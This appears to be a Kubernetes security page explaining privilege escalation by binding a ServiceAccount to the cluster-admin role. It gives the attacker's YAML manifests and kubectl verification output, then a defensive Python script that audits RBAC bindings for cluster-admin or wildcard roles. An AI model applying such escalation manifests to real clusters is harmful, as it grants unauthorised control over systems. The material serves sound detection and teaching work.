
Cluster-admin binding

Role-based access control (RBAC) is a key security feature in Kubernetes. RBAC restricts the actions that the various identities in the cluster are allowed to perform. cluster-admin is a built-in, highly privileged ClusterRole. Attackers who have permissions to create RoleBindings and ClusterRoleBindings in the cluster can create a binding to the cluster-admin ClusterRole, or to other highly privileged roles, and so escalate their privileges.

Example

Create a new ServiceAccount named evil-admin.

apiVersion: v1
kind: ServiceAccount
metadata:
  name: evil-admin
  namespace: default

Create a new RoleBinding (or ClusterRoleBinding) that binds our evil-admin ServiceAccount to the cluster-admin role.

kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: evil-admin-binding
  namespace: default
subjects:
  - kind: ServiceAccount
    name: evil-admin
    namespace: default
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io

We now have full control over the default namespace. Because a RoleBinding was used, the cluster-admin permissions apply only inside that namespace; a ClusterRoleBinding to the same ClusterRole would grant them cluster-wide.

$ kubectl auth can-i -n default --list --as system:serviceaccount:default:evil-admin
Resources                   Non-Resource URLs                   Resource Names   Verbs
*.*                         []                                  []               [*]
                            [*]                                 []               [*]
...
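From the defender's side, the binding created above is easy to find if you look for it: every RoleBinding or ClusterRoleBinding whose roleRef points at cluster-admin (or at any ClusterRole whose rules are pure wildcards) deserves a review, and a ServiceAccount subject is the most suspicious kind, since every pod running as that account inherits the privilege. The following audit script is an added example and not part of the original page or any project; it reads the JSON that `kubectl get clusterroles,clusterrolebindings,rolebindings -A -o json` produces. The embedded SAMPLE is constructed: it contains the evil-admin-binding from the page, the real built-in cluster-admin ClusterRole and its system:masters binding, a hypothetical custom wildcard ClusterRole named ops-superuser bound to a user alice, and a trimmed view role as a benign control.

```python
"""Audit Kubernetes RBAC bindings for subjects bound to cluster-admin or wildcard roles."""
import json
import sys

# Constructed sample in the shape returned by
#   kubectl get clusterroles,clusterrolebindings,rolebindings -A -o json
# (a List whose items carry their own `kind`). Only the fields the audit reads
# are kept and the `view` rules are trimmed. `ops-superuser`, `alice` and
# `reader` are hypothetical; `evil-admin-binding` is the binding from the page.
SAMPLE = json.loads("""
{
  "kind": "List",
  "items": [
    {"kind": "ClusterRole", "metadata": {"name": "cluster-admin"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]},
               {"nonResourceURLs": ["*"], "verbs": ["*"]}]},
    {"kind": "ClusterRole", "metadata": {"name": "ops-superuser"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"kind": "ClusterRole", "metadata": {"name": "view"},
     "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list", "watch"]}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "cluster-admin"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "Group", "name": "system:masters"}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "ops-superuser-binding"},
     "roleRef": {"kind": "ClusterRole", "name": "ops-superuser"},
     "subjects": [{"kind": "User", "name": "alice"}]},
    {"kind": "RoleBinding", "metadata": {"name": "evil-admin-binding", "namespace": "default"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "ServiceAccount", "name": "evil-admin", "namespace": "default"}]},
    {"kind": "RoleBinding", "metadata": {"name": "readers", "namespace": "default"},
     "roleRef": {"kind": "ClusterRole", "name": "view"},
     "subjects": [{"kind": "ServiceAccount", "name": "reader", "namespace": "default"}]}
  ]
}
""")


def role_is_wildcard(role):
    """True if any rule grants every verb on every resource in every API group,
    or every verb on every non-resource URL (the shape of cluster-admin's rules)."""
    for rule in role.get("rules") or []:
        if "*" not in rule.get("verbs", []):
            continue
        if "*" in rule.get("apiGroups", []) and "*" in rule.get("resources", []):
            return True
        if "*" in rule.get("nonResourceURLs", []):
            return True
    return False


def privileged_cluster_roles(items):
    """Names of ClusterRoles that are effectively cluster-admin. The built-in name is
    always included so a dump that omits ClusterRoles still flags its bindings."""
    names = {"cluster-admin"}
    for item in items:
        if item.get("kind") == "ClusterRole" and role_is_wildcard(item):
            names.add(item["metadata"]["name"])
    return names


def audit(items):
    """One finding per subject bound to a privileged ClusterRole, with its scope."""
    privileged = privileged_cluster_roles(items)
    findings = []
    for item in items:
        kind = item.get("kind")
        if kind not in ("RoleBinding", "ClusterRoleBinding"):
            continue
        ref = item.get("roleRef", {})
        if ref.get("kind") != "ClusterRole" or ref.get("name") not in privileged:
            continue
        # A RoleBinding confines even cluster-admin to its own namespace;
        # a ClusterRoleBinding grants it everywhere.
        if kind == "ClusterRoleBinding":
            scope = "cluster-wide"
        else:
            scope = "namespace:" + item["metadata"].get("namespace", "default")
        for subj in item.get("subjects") or []:
            name = subj["name"]
            if subj["kind"] == "ServiceAccount":
                name = subj.get("namespace", "default") + "/" + name
            findings.append({
                "binding": item["metadata"]["name"],
                "role": ref["name"],
                "scope": scope,
                "subject": subj["kind"] + ":" + name,
            })
    return findings


def service_account_findings(findings):
    """Findings whose subject is a ServiceAccount: any pod running as that account,
    and anyone able to read its token, inherits the privilege."""
    return [f for f in findings if f["subject"].startswith("ServiceAccount:")]


if __name__ == "__main__":
    # Pass a JSON dump path as the first argument to audit a real cluster; otherwise the sample runs.
    items = json.load(open(sys.argv[1]))["items"] if len(sys.argv) > 1 else SAMPLE["items"]
    for f in audit(items):
        print(f"{f['scope']:<20} {f['binding']:<24} -> {f['role']:<16} {f['subject']}")
```

On the sample, the script reports three subjects: the expected system:masters group, the custom wildcard role bound to alice (which a check for the literal name cluster-admin would miss), and the evil-admin ServiceAccount, scoped to the default namespace. The built-in system:masters binding is normal; the other two are what a reviewer should chase, and the ServiceAccount one is the case this page describes.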
